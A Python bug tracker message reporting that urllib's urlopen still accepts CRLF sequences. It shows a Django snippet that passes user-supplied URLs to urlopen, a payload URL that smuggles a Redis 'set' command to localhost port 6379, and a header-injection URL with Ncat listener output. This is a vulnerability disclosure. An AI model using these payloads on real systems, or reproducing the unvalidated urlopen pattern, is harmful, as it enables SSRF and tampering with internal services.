Message 385389 - Python tracker

➜

This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

Author	bfpiaoran
Recipients	bfpiaoran, lemburg, orsenthil
Date	2021-01-21.04:02:32
SpamBayes Score	-1.0
Marked as misclassified	Yes
Message-id	<1611201755.22.0.579642102837.issue42987@roundup.psfhosted.org>
In-reply-to

Content
Recently,(on windows) I discovered a security issue during a security review due to urllib.I checked the document and found that it has been fixed at https://bugs.python.org/issue22928.but My python version is 3.7.2 over the fix bug version .Then tried to find the reason The code is probably as follows under the django framework ``` from urllib.request import urlopen remote_urls = request.POST.getlist("source[]", []) for remote_url in remote_urls: remote_image = urlopen(remote_url) ``` source[]=http://127.0.0.1:6379/%0d%0aset%20ce%20test%0d%0a/1.jpg Changing the address will make urlopen connect to the local machine 6379 and set the key value python3 Python 3.7.2 (tags/v3.7.2:9a3ffc0492, Dec 23 2018, 22:20:52) [MSC v.1916 32 bit (Intel)] on win32 Type "help", "copyright", "credits" or "license" for more information. >>> from django.utils.six.moves.urllib.request import urlopen >>> remote_image = urlopen('http://127.0.0.1:6379/\r\nset ce test\r\n/1.jpg') Traceback (most recent call last): File "<stdin>", line 1, in <module> File "C:\Users\cuijianxiong\AppData\Local\Programs\Python\Python37-32\lib\urllib\request.py", line 222, in urlopen return opener.open(url, data, timeout) File "C:\Users\cuijianxiong\AppData\Local\Programs\Python\Python37-32\lib\urllib\request.py", line 525, in open response = self._open(req, data) File "C:\Users\cuijianxiong\AppData\Local\Programs\Python\Python37-32\lib\urllib\request.py", line 543, in _open '_open', req) File "C:\Users\cuijianxiong\AppData\Local\Programs\Python\Python37-32\lib\urllib\request.py", line 503, in _call_chain result = func(*args) File "C:\Users\cuijianxiong\AppData\Local\Programs\Python\Python37-32\lib\urllib\request.py", line 1345, in http_open return self.do_open(http.client.HTTPConnection, req) File "C:\Users\cuijianxiong\AppData\Local\Programs\Python\Python37-32\lib\urllib\request.py", line 1320, in do_open r = h.getresponse() File "C:\Users\cuijianxiong\AppData\Local\Programs\Python\Python37-32\lib\http\client.py", line 1321, in getresponse response.begin() File "C:\Users\cuijianxiong\AppData\Local\Programs\Python\Python37-32\lib\http\client.py", line 296, in begin version, status, reason = self._read_status() File "C:\Users\cuijianxiong\AppData\Local\Programs\Python\Python37-32\lib\http\client.py", line 278, in _read_status raise BadStatusLine(line) http.client.BadStatusLine: $-1 Django will encode and decode urlopen because of the url specification, and accept requests with "\r\n" in the url It is the responsibility of the developer leveraging Python and its HTTP client libraries to ensure that their (web) application acts in accordance to official HTTP specifications and that no threats to security will arise from their code. However, newlines inside headers are arguably a special case of breaking the conformity with RFC's in regard to the allowed character set. No illegal character used inside a HTTP header is likely to have a compromising side effect on back-end clients and servers and the integrity of their communication, as a result of the leniency of most web servers. However, a newline character (0x0A) embedded in a HTTP header invariably has the semantic consequence of denoting the start of an additional header line. To put it differently, not sanitizing headers in complete accordance to RFC's could be seen as as virtue in that it gives the programmer a maximum amount of freedom, without having to trade it for any likely or severe security ramifications, so that they may use illegal characters in testing environments and environments that are outlined by an expliticly less strict interpretation of the HTTP protocol. Newlines are special in that they enable anyone who is able to influence the header content, to, in effect, perform additional invocations to add_header(). urlopen('http://106.53.251.216:8888/\r\Auth: test\r\n/1.jpg') Ncat: Version 7.70 ( https://nmap.org/ncat ) Ncat: Listening on :::8888 Ncat: Listening on 0.0.0.0:8888 Ncat: Connection from 111.202.227.139. Ncat: Connection from 111.202.227.139:14411. \Auth: test /1.jpg HTTP/1.1 Accept-Encoding: identity Host: 106.53.251.216:8888 User-Agent: Python-urllib/3.7 Connection: close I think https://bugs.python.org/issue22928 is not very thorough and does not fully detect line breaks

Recently,(on windows) I discovered a security issue during a security review due to urllib.I checked the document and found that it has been fixed at https://bugs.python.org/issue22928.but My python version is 3.7.2 over the fix bug version .Then tried to find the reason
The code is probably as follows under the django framework

```
from urllib.request import urlopen



remote_urls = request.POST.getlist("source[]", [])
for remote_url in remote_urls:
    remote_image = urlopen(remote_url)

```
source[]=http://127.0.0.1:6379/%0d%0aset%20ce%20test%0d%0a/1.jpg

Changing the address will make urlopen connect to the local machine 6379 and set the key value

python3 



Python 3.7.2 (tags/v3.7.2:9a3ffc0492, Dec 23 2018, 22:20:52) [MSC v.1916 32 bit (Intel)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> from django.utils.six.moves.urllib.request import urlopen
>>> remote_image = urlopen('http://127.0.0.1:6379/\r\nset ce test\r\n/1.jpg')
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "C:\Users\cuijianxiong\AppData\Local\Programs\Python\Python37-32\lib\urllib\request.py", line 222, in urlopen        return opener.open(url, data, timeout)
  File "C:\Users\cuijianxiong\AppData\Local\Programs\Python\Python37-32\lib\urllib\request.py", line 525, in open           response = self._open(req, data)
  File "C:\Users\cuijianxiong\AppData\Local\Programs\Python\Python37-32\lib\urllib\request.py", line 543, in _open          '_open', req)
  File "C:\Users\cuijianxiong\AppData\Local\Programs\Python\Python37-32\lib\urllib\request.py", line 503, in _call_chain    result = func(*args)
  File "C:\Users\cuijianxiong\AppData\Local\Programs\Python\Python37-32\lib\urllib\request.py", line 1345, in http_open
    return self.do_open(http.client.HTTPConnection, req)
  File "C:\Users\cuijianxiong\AppData\Local\Programs\Python\Python37-32\lib\urllib\request.py", line 1320, in do_open
    r = h.getresponse()
  File "C:\Users\cuijianxiong\AppData\Local\Programs\Python\Python37-32\lib\http\client.py", line 1321, in getresponse
    response.begin()
  File "C:\Users\cuijianxiong\AppData\Local\Programs\Python\Python37-32\lib\http\client.py", line 296, in begin
    version, status, reason = self._read_status()
  File "C:\Users\cuijianxiong\AppData\Local\Programs\Python\Python37-32\lib\http\client.py", line 278, in _read_status
    raise BadStatusLine(line)
http.client.BadStatusLine: $-1



Django will encode and decode urlopen because of the url specification, and accept requests with "\r\n" in the url


It is the responsibility of the developer leveraging Python and its HTTP client libraries to ensure that their (web) application acts in accordance to official HTTP specifications and that no threats to security will arise from their code.
However, newlines inside headers are arguably a special case of breaking the conformity with RFC's in regard to the allowed character set. No illegal character used inside a HTTP header is likely to have a compromising side effect on back-end clients and servers and the integrity of their communication, as a result of the leniency of most web servers. However, a newline character (0x0A) embedded in a HTTP header invariably has the semantic consequence of denoting the start of an additional header line. To put it differently, not sanitizing headers in complete accordance to RFC's could be seen as as virtue in that it gives the programmer a maximum amount of freedom, without having to trade it for any likely or severe security ramifications, so that they may use illegal characters in testing environments and environments that are outlined by an expliticly less strict interpretation of the HTTP protocol. Newlines are special in that they enable anyone who is able to influence the header content, to, in effect, perform additional invocations to add_header().


urlopen('http://106.53.251.216:8888/\r\Auth: test\r\n/1.jpg')


Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888
Ncat: Connection from 111.202.227.139.
Ncat: Connection from 111.202.227.139:14411.
\Auth: test
/1.jpg HTTP/1.1
Accept-Encoding: identity
Host: 106.53.251.216:8888
User-Agent: Python-urllib/3.7
Connection: close



I think https://bugs.python.org/issue22928 is not very thorough and does not fully detect line breaks

History
Date	User	Action	Args
2021-01-21 04:02:35	bfpiaoran	set	recipients: + bfpiaoran, lemburg, orsenthil
2021-01-21 04:02:35	bfpiaoran	set	messageid: <1611201755.22.0.579642102837.issue42987@roundup.psfhosted.org>
2021-01-21 04:02:35	bfpiaoran	link	issue42987 messages
2021-01-21 04:02:32	bfpiaoran	create